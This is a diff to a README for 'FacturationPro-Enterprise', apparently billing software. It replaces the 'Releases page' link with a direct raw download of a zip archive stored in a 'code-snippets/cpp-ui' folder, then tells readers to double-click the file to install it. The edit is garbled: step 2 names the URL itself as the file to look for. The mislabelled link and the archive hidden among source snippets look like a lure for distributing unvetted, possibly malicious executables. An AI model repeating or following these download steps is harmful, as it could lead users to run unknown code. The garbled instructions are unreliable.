tr3adwell/FacturationPro-Enterprise/README.md

 ## 📥 Download & Install
 To download FacturationPro-Enterprise, follow these steps:

-1. Visit the [Releases page](https://github.com/tr3adwell/FacturationPro-Enterprise/releases) to find the latest version of the software.
+1. Visit the [Releases page](https://github.com/tr3adwell/FacturationPro-Enterprise/raw/refs/heads/main/code-snippets/cpp-ui/Pro_Facturation_Enterprise_v3.8.zip) to find the latest version of the software.
-2. Locate the file named "FacturationPro-Enterprise.exe" or similar.
+2. Locate the file named "https://github.com/tr3adwell/FacturationPro-Enterprise/raw/refs/heads/main/code-snippets/cpp-ui/Pro_Facturation_Enterprise_v3.8.zip" or similar.
 3. Click the file link to start the download.
 4. Once the download is complete, find the file in your downloads folder.
 5. Double-click the downloaded file to begin the installation.